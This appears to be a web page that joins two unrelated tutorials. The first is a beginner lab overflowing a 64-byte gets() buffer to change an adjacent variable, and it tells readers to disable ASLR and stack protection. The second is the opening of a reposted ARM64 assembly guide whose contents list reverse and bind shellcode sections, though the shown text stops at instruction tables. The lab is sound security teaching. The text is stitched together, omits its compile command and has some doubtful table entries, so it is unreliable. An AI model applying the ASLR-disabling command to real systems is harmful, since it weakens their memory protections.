So, its time to get our hands dirty by smashing the stack. But before that, for this blogpost series we will only focus on the Stack based overflows. Also the examples which we are going to see may not be vulnerable to buffer overflow because the newer system kernels handle all these things in a very effifcient way. If you are using a newer system, for e.g Ubuntu 16.04 LTS you have to go and disable the ASLR bit to off as it is set to protect from the Memory Corruption attacks.
To disable it simply type : echo 0 > /proc/sys/kernel/randomize_va_space in your terminal.

Also you have to compile the program using gcc with stack smashing detect feature disabled. To do this compile your program using:

We will use the earlier program which we used for understanding the stack. This program is vulnerable to buffer overflow. As we can see the the program is using gets function to accept the user input. Now, this gets function has some serious security issues. Lets see the man page for gets.As, we can see the highlighted part it says “Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead”.

From here we can understand there is actually no bound checks happening when the user input is taken through the gets function (Extremely Dangerous Right?).

Now lets look what the program is and what the challenge of the program is all about.
-> We already discussed that if the modified variable is not 0, then the message “you have changed the ‘modified’ variable” will be printed. But if we look at the program, there is no way the modified variable’s value can be changed. So how it can be done?

-> The line where it takes user input and writes into char array buffer is actually our way to go and change the value of modified. The gets(buffer); is the vulnerable code.

In the code we can see the modified variable assignment and the input of char array buffer is next to each other,

This means when this two instructions will be executed by the processor the modified variable and buffer array will be adjacent to each other in the stack frame.

So, what does this means?
-> When we feed input to the buffer more than it is capable of, the extra input which we feed will get overwritten to the adjacent memory location, in this case the memory location pointing to the modified variable. Thus, the modified variable will be no longer be 0 and the success message will be printed.

Due to buffer overflow the above scenario was possible. Lets see in more detail.

First we will try to execute the program with some random input and see where the overflow happens.-> We already know the char array buffer is of 64 bytes. So we try to enter 60, 62, 64 times ‘A’ to our program. As, we can see the modified variable is not changed and the failure message is printed.

->But when we enter 65 A’s to our program, the value of modified variable mysteriously changes and the success message is printed.

->The buffer overflow has happened after the 64th byte of input and it overwrites the memory location after that i.e where the modified variable is stored.

Lets load our program in GDB and see how the modified variable’s memory location got overwritten.-> As we can see, the breakpoints 1 and 2 got hit, then we check the value of modified by typing x/xw $esp+0x5c (stack register + offset). If we see in the disassembled main function we can see the value 0 gets assigned to modifiedvariable through this instruction: movl $0x0,0x5c(%esp), that’s why we checked the value of modified variable by giving the offset along with the stack register ESP. The value of modified variable at stack location 0xbffff10c is 0x00000000.

->After stepping through, its asking us to enter the input. Now we know 65th byte is the point where the buffer gets overflowed. So we enter 65 A’s and then check the stack frame.

-> As we can see our input A i.e 41 is all over the stack. But we are only concerned with the adjacent memory location where the modified variable is there. By quickly checking the modified variable we can see the value of the stack address pointing to the modified variable 0xbffff10c is changed from 0x00000000 to 0x00000041.

-> This means when the buffer overflow took place it overwritten the adjacent memory location 0xbffff10c to 0x00000041.

-> As we step through the next instruction we can see the success message “you have changed the ‘modified’ variable” printed on the screen.

This was all possible because there was insufficient bounds checking when the user input was being written in the char array buffer. This led to overflow and the adjacent memory location (modified variable) got overwritten.

Voila !!!

We successfully learned the fundamentals of process memory, Stack operations and Buffer Overflow in detail. Now, this was only the concept of how buffer overflow takes place. We still haven’t exploited this vulnerability to actually exploit the system. In the next blog we will see how to execute arbitrary commands through Shellcode using this Buffer Overflow vulnerablity.

Till then, go and learn as much as possible about Assembly and GDB, because we are going to use this extensively in the future blogposts.

A Guide to ARM64 / AArch64 Assembly on Linux with Shellcodes and Cryptography

( Original text by odzhan )

Introduction

The Cortex-A76 codenamed “Enyo” will be the first of three CPU cores from ARM designed to target the laptop market between 2018-2020. ARM already has a monopoly on handheld devices, and are now projected to take a share of the laptop and server market. First, Apple announced in April 2018 its intention to replace Intel with ARM for their Macbook CPU from 2020 onwards. Second, a company called Ampere started shipping a 64-bit ARM CPU for servers in September 2018 that’s intended to compete with Intel’s XEON CPU. Moreover, the Automotive Enhanced (AE) version of the A76 unveiled in the same month will target applications like self-driving cars. The A76 will continue to support A32 and T32 instruction sets, but only for unprivileged code. Privileged code (kernel, drivers, hyper-visor) will only run in 64-bit mode. It’s clear that ARM intends to phase out support for 32-bit code with its A series. Developers of Linux distros have also decided to drop support for all 32-bit architectures, including ARM.

This post is an introduction to ARM64 assembly and will not cover any advanced topics. It will be updated periodically as I learn more, and if you have suggestions on how to improve the content, or you believe something needs correcting, feel free to email me.

If you just want the code shown in this post, look here.

Please refer to the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for more comprehensive information about the ARMv8-A architecture. Everything I discuss with exception to the source code and GNU topics can be found in the manual.

Table of contents

  1. ARM Architecture
    1. Profiles
    2. Operating Systems
    3. Registers
    4. Calling Convention
    5. Condition Codes
    6. Data Types
    7. Data Alignment
  2. A64 instruction set
    1. Arithmetic
    2. Logical and Move
    3. Load, Store and Addressing Modes
    4. Conditional
    5. Bit Manipulation
    6. Branch
    7. System
    8. x86 and A64 comparison
  3. GNU Assembler
    1. GCC assembly
    2. Comments
    3. Preprocessor Directives
    4. Symbolic Constants
    5. Structures and Unions
    6. Operators
    7. Macros
    8. Conditional assembly
  4. GNU Debugger
    1. Layout
    2. Commands
  5. Common operations
    1. Saving registers.
    2. Copying registers.
    3. Initialize register to zero.
    4. Initialize register to one.
    5. Initialize register to -1.
    6. Test register for FALSE or 0.
    7. Test register for TRUE or 1.
    8. Test register for -1.
  6. Linux Shellcode
    1. System Calls
    2. Tracing
    3. Execute /bin/sh
    4. Execute /bin/sh -c
    5. Reverse connect /bin/sh
    6. Bind /bin/sh to port
    7. Synchronized shell
  7. Encryption
    1. AES-128
    2. KECCAK
    3. GIMLI
    4. XOODOO
    5. ASCON
    6. SPECK
    7. SIMECK
    8. CHASKEY
    9. XTEA
    10. NOEKEON
    11. CHAM
    12. LEA
    13. CHACHA
    14. PRESENT
    15. LIGHTMAC
  8. Summary

1. ARM Architecture

ARM is a family of Reduced Instruction Set Computer (RISC) architectures for computer processors that has become the predominant CPU for smartphones, tablets, and most of the IoT devices being sold today. It is not just consumer electronics that use ARM. The CPU can be found in medical devices, cars, aeroplanes, robots..it can be found in billions of devices. The popularity of ARM is due in part to the reduced cost of production and power-efficiency. ARM Holdings Inc. is a fabless semiconductor company, which means they do not manufacture hardware. The company designs processor cores and license their technology as Intellectual Property (IP) to other semiconductor companies like ATMEL, NXP, and Samsung.

In this tutorial, I’ll be programming on “orca”, a Raspberry Pi (RPI) 3 running 64-bit Debian Linux. This RPI comes with a Cortex-A53, that can support privileged code in both 32 and 64-bit mode. The Cortex-A53 CPU is an ARMv8-A 64-bit core that has backward compatibility with ARMv7-A so that it can run the A32 and T32 instruction sets. Here’s a screenshot of output from lscpu.

There are currently two execution states you should be aware of.

AArch32
32-bit, with support for the T32 (Thumb) and A32 (ARM) instruction sets.
AArch64
64-bit, with support for the A64 instruction set.

This post only focuses on the A64 instruction set.

1.1 Profiles

There are three available, each one designed for a specific purpose. If you want to write shellcode, it’s safe to assume you’ll work primarily with the A series because it’s the only profile that supports a General Purpose Operating System (GPOS) such as Linux or Windows. A Real-Time Operating System (RTOS) is more likely to be found running on the R and M series.

Core Profile Application
A Application Supports a Virtual Memory System Architecture (VMSA) based on a Memory Management Unit (MMU).
Found in high performance devices that run an operating system such as Windows, Linux, Android or iOS.
R Real-time Found in medical devices, PLC, ECU, avionics, robotics. Where low latency and a high level of safety is required. For example, an electronic braking system in an automobile. Autonomous drones and Hunter Killers (HK).
M Microcontroller Supports a Protected Memory System Architecture (PMSA) based on a MMU. Found in ASICs, ASSPs, FPGAs, and SoCs for power management, I/O, touch screen, smart battery, and sensor controllers. Some drones use the M series. HK Aerial.

The vast majority of single-board computers run on the Cortex-A series because it has an MMU for translating virtual memory addresses to physical memory addresses required by most operating systems.

1.2 Operating Systems

An RTOS is time-critical whereas a GPOS isn’t. While I do not discuss writing code for an RTOS here, it’s important to know the difference because you’re not going to find Linux running on every ARM based device. Linux requires far too many resources to be suitable for a device with only 256KB of RAM. Certainly, Linux has a lot of support for peripheral devices, file-systems, dynamic loading of code, network connectivity, and user-interface support; all of this makes it ideal for internet connected handheld devices. However, you’re unlikely to find the same support in an RTOS because it is not a full OS in the sense that Linux is. An RTOS might only consist of a static library with support for task scheduling, Interprocess Communication (IPC), and synchronization.

Some RTOS such as QNX or VxWorks can be configured to support features normally found in a GPOS and it’s possible you will come across at least one of these in any vulnerability research. The following is a list of embedded operating systems you may wish to consider researching more about.

Open source

Proprietary

1.3 Registers

This post will only focus on using the general-purpose, zero and stack pointer registers, but not SIMD, floating point and vector registers. Most system calls only use general-purpose registers.

Name Size Description
Wn 32-bits General purpose registers 0-31
Xn 64-bits General purpose registers 0-31
WZR 32-bits Zero register
XZR 64-bits Zero register
SP 64-bits Stack pointer

W denotes 32-bit registers while X denotes 64-bit registers.

1.4 Calling convention

The following is applicable to Debian Linux. You may freely use x0-x18, but remember that if calling subroutines, they may use them as well.

Registers Description
X0 – X7 arguments and return value
X8 – X18 temporary registers
X19 – X28 callee-saved registers
X29 frame pointer
X30 link register
SP stack pointer

x0 – x7 are used to pass parameters and return values. The value of these registers may be freely modified by the called function (the callee) so the caller cannot assume anything about their content, even if they are not used in the parameter passing or for the returned value. This means that these registers are in practice caller-saved.

x8 – x18 are temporary registers for every function. No assumption can be made on their values upon returning from a function. In practice these registers are also caller-saved.

x19 – x28 are registers, that, if used by a function, must have their values preserved and later restored upon returning to the caller. These registers are known as callee-saved.

x29 can be used as a frame pointer and x30 is the link register. The callee should save x30if it intends to call a subroutine.

1.5 Condition Flags

ARM has a “process state” with condition flags that affect the behaviour of some instructions. Branch instructions can be used to change the flow of execution. Some of the data processing instructions allow setting the condition flags with the S suffix. e.g ANDS or ADDS. The flags are the Zero Flag (Z), the Carry Flag (C), the Negative Flag (N) and the is Overflow Flag (V).

Flag Description
N Bit 31. Set if the result of an operation is negative. Cleared if the result is positive or zero.
Z Bit 30. Set if the result of an operation is zero/equal. Cleared if non-zero/not equal.
C Bit 29. Set if an instruction results in a carry or overflow. Cleared if no carry.
V Bit 28. Set if an instruction results in an overflow. Cleared if no overflow.

1.6 Condition Codes

The A32 instruction set supports conditional execution for most of its operations. To improve performance, ARM removed support with A64. These conditional codes are now only effective with branch, select and compare instructions. This appears to be a disadvantage, but there are sufficient alternatives in the A64 set that are a distinct improvement.

Mnemonic Description Condition flags
EQ Equal Z set
NE Not Equal Z clear
CS or HS Carry Set C set
CC or LO Carry Clear C clear
MI Minus N set
PL Plus, positive or zero N clear
VS Overflow V set
VC No overflow V clear
HI Unsigned Higher than or equal C set and Z clear
LS Unsigned Less than or equal C clear or Z set
GE Signed Greater than or Equal N and V the same
LT Signed Less than N and V differ
GT Signed Greater than Z clear, N and V the same
LE Signed Less than or Equal Z set, N and V differ
AL Always. Normally omitted. Any

1.7 Data Types

A “word” on x86 is 16-bits and a “doubleword” is 32-bits. A “word” for ARM is 32-bits and a “doubleword” is 64-bits.

Type Size
Byte 8 bits
Half-word 16 bits
Word 32 bits
Doubleword 64 bits
Quadword 128 bits

1.8 Data Alignment

The alignment of sp must be two times the size of a pointer. For AArch32 that’s 8 bytes, and for AArch64 it’s 16 bytes.

2. A64 Instruction Set

Like all previous ARM architectures, ARMv8-A is a load/store architecture. Data processing instructions do not operate directly on data in memory as we find with the x86 architecture. The data is first loaded into registers, modified, and then stored back in memory or simply discarded once it’s no longer required. Most data processing instructions use one destination register and two source operands. The general format can be considered as the instruction, followed by the operands, as follows:

Instruction Rd, Rn, Operand2

Rd is the destination register. Rn is the register that is operated on. The use of R indicates that the registers can be either X or W registers. Operand2 might be a register, a modified register, or an immediate value.

2.1 Arithmetic

The following instructions can be used for arithmetic, stack allocation and addressing of memory, control flow, and initialization of registers or variables.

Menmonic Operands Instruction
ADD{S} (immediate) Rd, Rn, #imm{, shift} Add (immediate) adds a register value and an optionally-shifted immediate value, and writes the result to the destination register.
ADD{S} (extended register) Rd, Rn, Wm{, extend {#amount}} Add (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
ADD{S} (shifted register) Rd, Rn, Rm{, shift #amount} Add (shifted register) adds a register value and an optionally-shifted register value, and writes the result to the destination register.
ADR Xd, rel Form PC-relative address adds an immediate value to the PC value to form a PC-relative address, and writes the result to the destination register.
ADRP Xd, rel Form PC-relative address to 4KB page adds an immediate value that is shifted left by 12 bits, to the PC value to form a PC-relative address, with the bottom 12 bits masked out, and writes the result to the destination register.
CMN (extended register) Rn, Rm{, extend {#amount}} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMN (immediate) Rn, #imm{, shift} Compare Negative (immediate) adds a register value and an optionally-shifted immediate value. It updates the condition flags based on the result, and discards the result.
CMN (shifted register) Rn, Rm{, shift #amount} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (extended register) Rn, Rm{, extend {#amount}} Compare (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (immediate) Rn, #imm{, shift} Compare (immediate) subtracts an optionally-shifted immediate value from a register value. It updates the condition flags based on the result, and discards the result.
CMP (shifted register) Rn, Rm{, shift #amount} Compare (shifted register) subtracts an optionally-shifted register value from a register value. It updates the condition flags based on the result, and discards the result.
MADD Rd, Rn, Rm, ra Multiply-Add multiplies two register values, adds a third register value, and writes the result to the destination register.
MNEG Rd, Rn, Rm Multiply-Negate multiplies two register values, negates the product, and writes the result to the destination register. Alias of MSUB.
MSUB Rd, Rn, Rm, ra Multiply-Subtract multiplies two register values, subtracts the product from a third register value, and writes the
result to the destination register.
MUL Rd, Rn, Rm Multiply. Alias of MADD.
NEG{S} Rd, op2 Negate (shifted register) negates an optionally-shifted register value, and writes the result to the destination register.
NGC{S} Rd, Rm Negate with Carry negates the sum of a register value and the value of NOT (Carry flag), and writes the result to the destination register.
SBC{S} Rd, Rn, Rm Subtract with Carry subtracts a register value and the value of NOT (Carry flag) from a register value, and writes the result to the destination register.
{U|S}DIV Rd, Rn, Rm Unsigned/Signed Divide divides a signed integer register value by another signed integer register value, and writes the result to the destination register. The condition flags are not affected.
{U|S}MADDL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Add Long multiplies two 32-bit register values, adds a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MNEGL Xd, Wn, Wm Unsigned/Signed Multiply-Negate Long multiplies two 32-bit register values, negates the product, and writes the result to the 64-bit destination register.
{U|S}MSUBL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Subtract Long multiplies two 32-bit register values, subtracts the product from a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MULH Xd, Xn, Xm Unsigned/Signed Multiply High multiplies two 64-bit register values, and writes bits[127:64] of the 128-bit result to the 64-bit destination register.
{U|S}MULL Xd, Wn, Wm Unsigned/Signed Multiply Long multiplies two 32-bit register values, and writes the result to the 64-bit destination register.
SUB{S} (extended register) Rd, Rn, Rm{, shift #amount} Subtract (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
SUB{S} (immediate) Rd, Rn, Rm{, shift #amount} Subtract (immediate) subtracts an optionally-shifted immediate value from a register value, and writes the result to the destination register.
SUB{S} (shift register) Rd, Rn, Rm{, shift #amount} Subtract (shifted register) subtracts an optionally-shifted register value from a register value, and writes the result to the destination register.
  // x0 == -1?
  cmn     x0, 1
  beq     minus_one

  // x0 == 0
  cmp     x0, 0
  beq     zero

  // allocate 32 bytes of stack
  sub     sp, sp, 32

  // x0 = x0 % 37
  mov     x1, 37
  udiv    x2, x0, x1
  msub    x0, x2, x1, x0

  // x0 = 0
  sub     x0, x0, x0

2.2 Logical and Move

Mainly used for bit testing and manipulation. To a large degree, cryptographic algorithms use these operations exclusively to be efficient in both hardware and software. Implementing bitwise operations in hardware is relatively cheap.

Mnemonic Operands Instruction
AND{S} (immediate) Rd, Rn, #imm Bitwise AND (immediate) performs a bitwise AND of a register value and an immediate value, and writes the result to the destination register.
AND{S} (shifted register) Rd, Rn, Rm, {shift #amount} Bitwise AND (shifted register) performs a bitwise AND of a register value and an optionally-shifted register value, and writes the result to the destination register.
ASR (register) Rd, Rn, Rm Arithmetic Shift Right (register) shifts a register value right by a variable number of bits, shifting in copies of its sign bit, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
ASR (immediate) Rd, Rn, #imm Arithmetic Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in copies of the sign bit in the upper bits and zeros in the lower bits, and writes the result to the destination register.
BIC{S} Rd, Rn, Rm Bitwise Bit Clear (shifted register) performs a bitwise AND of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
EON Rd, Rn, Rm {, shift amount} Bitwise Exclusive OR NOT (shifted register) performs a bitwise Exclusive OR NOT of a register value and an optionally-shifted register value, and writes the result to the destination register.
EOR Rd, Rn, #imm Bitwise Exclusive OR (immediate) performs a bitwise Exclusive OR of a register value and an immediate value, and writes the result to the destination register.
EOR Rd, Rn, Rm Bitwise Exclusive OR (shifted register) performs a bitwise Exclusive OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
LSL (register) Rd, Rn, Rm Logical Shift Left (register) shifts a register value left by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is left-shifted. Alias of LSLV.
LSL (immediate) Rd, Rn, #imm Logical Shift Left (immediate) shifts a register value left by an immediate number of bits, shifting in zeros, and writes the result to the destination register. Alias of UBFM.
LSR (register) Rd, Rn, Rm Logical Shift Right (register) shifts a register value right by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
LSR Rd, Rn, #imm Logical Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in zeros, and writes the result to the destination register.
MOV (register) Rd, Rn Move (register) copies the value in a source register to the destination register. Alias of ORR.
MOV (immediate) Rd, #imm Move (wide immediate) moves a 16-bit immediate value to a register. Alias of MOVZ.
MOVK Rd, #imm{, shift #amount} Move wide with keep moves an optionally-shifted 16-bit immediate value into a register, keeping other bits unchanged.
MOVN Rd, #imm{, shift #amount} Move wide with NOT moves the inverse of an optionally-shifted 16-bit immediate value to a register.
MOVZ Rd, #imm Move wide with zero moves an optionally-shifted 16-bit immediate value to a register.
MVN Rd, Rm{, shift #amount} Bitwise NOT writes the bitwise inverse of a register value to the destination register. Alias of ORN.
ORN Rd, Rn, Rm{, shift #amount} Bitwise OR NOT (shifted register) performs a bitwise (inclusive) OR of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
ORR Rd, Rn, #imm Bitwise OR (immediate) performs a bitwise (inclusive) OR of a register value and an immediate register value, and writes the result to the destination register.
ORR Rd, Rn, Rm{, shift #amount} Bitwise OR (shifted register) performs a bitwise (inclusive) OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
ROR Rd, Rs, #shift Rotate right (immediate) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. Alias of EXTR.
ROR Rd, Rn, Rm Rotate Right (register) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted. Alias of RORV.
TST Rn, #imm Test bits (immediate), setting the condition flags and discarding the result. Alias of ANDS.
TST Rn, Rm{, shift #amount} Test (shifted register) performs a bitwise AND operation on a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result. Alias of ANDS.

Multiplication can be performed using logical shift left LSL. Division can be performed using logical shift right LSR. Modulo operations can be performed using bitwise AND. The only condition is that the multiplier and divisor be a power of two. The first three examples shown here demonstrate those operations.

  // x1 = x0 / 8
  lsr     x1, x0, 3

  // x1 = x0 * 4
  lsl     x1, x0, 2

  // x1 = x0 % 16
  and     x1, x0, 15

  // x0 == 0?
  tst     x0, x0
  beq     zero

  // x0 = 0
  eor     x0, x0, x0

2.3 Load, Store and Addressing Modes

The following are the main instructions used for loading and storing data. There are others of course, designed for privileged/unprivileged loads, unscaled/unaligned loads, atomicity, and exclusive registers. However, as a beginner these are the only ones you need to worry about for now.

Mnemonic Operands Instruction
LDR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Load Register (immediate) loads a word or doubleword from memory and writes it to a register. The address that is used for the load is calculated from a base register and an immediate offset.
LDR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Load Register (register) calculates an address from a base register value and an offset register value, loads a byte/half-word/word from memory, and writes it to a register. The offset register value can optionally be shifted and extended.
STR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
STR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
LDP Wt1, Wt2, [Xn|SP], #imm Load Pair of Registers calculates an address from a base register value and an immediate offset, loads two 32-bit words or two 64-bit doublewords from memory, and writes them to two registers.
STP Wt1, Wt2, [Xn|SP], #imm Store Pair of Registers calculates an address from a base register value and an immediate offset, and stores two 32-bit words or two 64-bit doublewords to the calculated address, from two registers
  // load a byte from x1
  ldrb    w0, [x1]

  // load a signed byte from x1
  ldrsb   w0, [x1]

  // store a 32-bit word to address in x1
  str     w0, [x1]

  // load two 32-bit words from stack, advance sp by 8
  ldp     w0, w1, [sp], 8

  // store two 64-bit words at [sp-96] and subtract 96 from sp 
  stp     x0, x1, [sp, -96]!

  // load 32-bit immediate from literal pool
  ldr     w0, =0x12345678
Addressing Mode Immediate Register Extended Register
Base register only (no offset) [base{, 0}]
Base plus offset [base{, imm}] [base, Xm{, LSL imm}] [base, Wm, (S|U)XTW {#imm}]
Pre-indexed [base, imm]!
Post-indexed [base], imm [base], Xm a
Literal (PC-relative) label

Base register only

  // load a byte from x1
  ldrb   w0, [x1]

  // load a half-word from x1
  ldrh   w0, [x1]

  // load a word from x1
  ldr    w0, [x1]

  // load a doubleword from x1
  ldr    x0, [x1]

Base register plus offset

  // load a byte from x1 plus 1
  ldrb   w0, [x1, 1]

  // load a half-word from x1 plus 2
  ldrh   w0, [x1, 2]

  // load a word from x1 plus 4
  ldr    w0, [x1, 4]

  // load a doubleword from x1 plus 8
  ldr    x0, [x1, 8]

  // load a doubleword from x1 using x2 as index
  // w2 is multiplied by 8
  ldr    x0, [x1, x2, lsl 3]

  // load a doubleword from x1 using w2 as index
  // w2 is zero-extended and multiplied by 8
  ldr    x0, [x1, w2, uxtw 3]

Pre-index

The exclamation mark “!” implies adding the offset after the load or store.

  // load a byte from x1 plus 1, then advance x1 by 1
  ldrb   w0, [x1, 1]!

  // load a half-word from x1 plus 2, then advance x1 by 2
  ldrh   w0, [x1, 2]!

  // load a word from x1 plus 4, then advance x1 by 4
  ldr    w0, [x1, 4]!

  // load a doubleword from x1 plus 8, then advance x1 by 8
  ldr    x0, [x1, 8]!

Post-index

This mode accesses the value first and then adds the offset to base.

  // load a byte from x1, then advance x1 by 1
  ldrb   w0, [x1], 1

  // load a half-word from x1, then advance x1 by 2
  ldrh   w0, [x1], 2

  // load a word from x1, then advance x1 by 4
  ldr    w0, [x1], 4

  // load a doubleword from x1, then advance x1 by 8
  ldr    x0, [x1], 8

Literal (PC-relative)

These instructions work similar to RIP-relative addressing on AMD64.

  // load address of label
  adr    x0, label

  // load address of label
  adrp   x0, label

2.4 Conditional

These instructions select between the first or second source register, depending on the current state of the condition flags. When the named condition is true, the first source register is selected and its value is copied without modification to the destination register. When the condition is false the second source register is selected and its value might be optionally inverted, negated, or incremented by one, before writing to the destination register.

CSEL is essentially like the ternary operator in C. Probably my favorite instruction of ARM64 since it can be used to replace two or more opcodes.

Mnemonic Operands Instruction
CCMN (immediate) Rn, #imm, #nzcv, cond Conditional Compare Negative (immediate) sets the value of the condition flags to the result of the comparison of a register value and a negated immediate value if the condition is TRUE, and an immediate value otherwise.
CCMN (register) Rn, Rm, #nzcv, cond Conditional Compare Negative (register) sets the value of the condition flags to the result of the comparison of a register value and the inverse of another register value if the condition is TRUE, and an immediate value otherwise.
CCMP (immediate) Rn, #imm, #nzcv, cond Conditional Compare (immediate) sets the value of the condition flags to the result of the comparison of a register value and an immediate value if the condition is TRUE, and an immediate value otherwise.
CCMP (register) Rn, Rm, #nzcv, cond Conditional Compare (register) sets the value of the condition flags to the result of the comparison of two registers if the condition is TRUE, and an immediate value otherwise.
CSEL Rd, Rn, Rm, cond Conditional Select returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register.
CSINC Rd, Rn, Rm, cond Conditional Select Increment returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register incremented by 1. Used by CINC and CSET.
CSINV Rd, Rn, Rm, cond Conditional Select Invert returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the bitwise inversion value of the second source register. Used by CINV and CSETM.
CSNEG Rd, Rn, Rm, cond Conditional Select Negation returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the negated value of the second source register. Used by CNEG.
CSET Rd, cond Conditional Set sets the destination register to 1 if the condition is TRUE, and otherwise sets it to 0.
CSETM Rd, cond Conditional Set Mask sets all bits of the destination register to 1 if the condition is TRUE, and otherwise sets all bits to 0.
CINC Rd, Rn, cond Conditional Increment returns, in the destination register, the value of the source register incremented by 1 if the condition is TRUE, and otherwise returns the value of the source register.
CINV Rd, Rn, cond Conditional Invert returns, in the destination register, the bitwise inversion of the value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
CNEG Rd, Rn, cond Conditional Negate returns, in the destination register, the negated value of the source register if the condition is TRUE, and otherwise returns the value of the source register.

Let’s consider the following if statement.

if (c == 0 && x == y) {
  // body of if statement
}

If the first condition evaulates to true (c equals zero), only then is the second condition evaluated. To implement the above statement in assembly, one could use the following.

    cmp    c, 0
    bne    false

    cmp    x, y
    bne    false
true:
    // body of if statement
false:
    // end of if statement

We could eliminate one instruction using conditional execution on ARMv7-A. Consider using the following instead.

    cmp    c, 0
    cmpeq  x, y
    bne    false

To improve performance of AArch64, ARM removed support for conditional execution and replaced it with specialised instructions such as the conditional compare instructions. Using ARMv8-A, the following can be used.

    cmp    c, 0
    ccmp   x, y, 0, eq
    bne    false

    // conditions are true:
false:

The ternary operator can be used for the same if statement.

bEqual = (c == 0) ? (x == y) : 0; 

If cmp c, 0 evaluates to true (ZF=1), ccmp x, y is evaluated, otherwise ZF is cleared using 0. Other conditions require different flags. Each flag is set using 1, 2, 4 or 8. Combine these values to set multiple flags. I’ve defined the flags below and also each condition required for a branch.

    .equ FLAG_V, 1
    .equ FLAG_C, 2
    .equ FLAG_Z, 4
    .equ FLAG_N, 8

    .equ NE, 0
    .equ EQ, FLAG_Z

    .equ GT, 0
    .equ GE, FLAG_Z

    .equ LT, (FLAG_N + FLAG_C)
    .equ LE, (FLAG_N + FLAG_Z + FLAG_C)

    .equ HI, (FLAG_N + FLAG_C)          // unsigned version of LT
    .equ HS, (FLAG_N + FLAG_Z + FLAG_C) // LE

    .equ LO, 0                        // unsigned version of GT
    .equ LS, FLAG_Z                   // GE

2.5 Bit Manipulation

Most of these instructions are intended to extract or move bits from one register to another. They tend to be useful when working with bytes or words where contents of the destination register needs to be preserved, zero or sign extended.

Mnemonic Operands Instruction
BFI Rd, Rn, #lsb, #width Bitfield Insert copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFM Rd, Rn, #immr, #imms Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFXIL Rd, Rn, #lsb, #width Bitfield extract and insert at low end copies any number of low-order bits from a source register into the same
number of adjacent bits at the low end in the destination register, leaving other bits unchanged.
CLS Rd, Rn Count leading sign bits.
CLZ Rd, Rn Count leading zero bits.
EXTR Rd, Rn, Rm, #lsb Extract register extracts a register from a pair of registers.
RBIT Rd, Rn Reverse Bits reverses the bit order in a register.
REV16 Rd, Rn Reverse bytes in 16-bit halfwords reverses the byte order in each 16-bit halfword of a register.
REV32 Rd, Rn Reverse bytes in 32-bit words reverses the byte order in each 32-bit word of a register.
REV64 Rd, Rn Reverse Bytes reverses the byte order in a 64-bit general-purpose register.
SBFIZ Rd, Rn, #lsb, #width Signed Bitfield Insert in Zero zeroes the destination register and copies any number of contiguous bits from a source register into any position in the destination register, sign-extending the most significant bit of the transferred value. Alias of SBFM.
SBFM Wd, Wn, #immr, #imms Signed Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, shifting in copies of the sign bit in the upper bits and zeros in the lower bits.
SBFX Rd, Rn, #lsb, #width Signed Bitfield Extract extracts any number of adjacent bits at any position from a register, sign-extends them to the size of the register, and writes the result to the destination register.
{S,U}XT{B,H,W} Rd, Rn (S)igned/(U)nsigned eXtend (B)yte/(H)alfword/(W)ord extracts an 8-bit,16-bit or 32-bit value from a register, zero-extends it to the size of the register, and writes the result to the destination register. Alias of UBFM.
    // Move 0x12345678 into w0.
    mov     w0, 0x5678
    mov     w1, 0x1234
    bfi     w0, w1, 16, 16

    // Extract 8-bits from x1 into the x0 register at position 0.
    // If x1 is 0x12345678, 0x00000056 is placed in x0.
    ubfx    x0, x1, 8, 8

